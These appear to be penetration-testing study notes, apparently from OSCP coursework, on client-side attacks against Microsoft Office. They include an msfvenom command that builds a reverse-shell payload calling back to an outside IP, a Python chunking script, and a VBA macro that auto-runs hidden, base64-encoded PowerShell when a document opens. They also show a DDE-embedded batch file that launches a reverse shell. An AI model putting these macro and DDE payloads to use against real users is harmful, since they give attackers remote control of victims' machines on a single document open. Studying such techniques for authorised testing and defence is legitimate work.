Client-side Exploit

Windows Office Marco

Here is a sample from OSCP course:

First use msfvenom to create a reverse shell payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.176 LPORT=443 -f hta-psh -o evil.hta

In the file evil.hta, you will see the powershell script encoded with base64.

For marco, the max. length of a string is only 50 characters and therefore we have to split it. Here is an example Python script:

str = "<powershell script>"
n = 50

for i in range(0, len(str), n):
    print "Str = Str + " + '"' + str[i:i+n] + '"'

Then we can craft our MS macro:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e ...."
    Str = Str + ...
    <paste the output of the python script here>
    CreateObject("Wscript.Shell").Run Str
End Sub

When the office client open this document, a reverse shell will call back.

Windows Office DDE

You can embed bat file, which could give us a reverse shell when a user clicks on the DDE object.

Prepare a bat file like:

START powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQA......

Then in Office, in the Insert ribbon > Object > Create from File, and then choose your bat script. You can even display as icon and change the display name.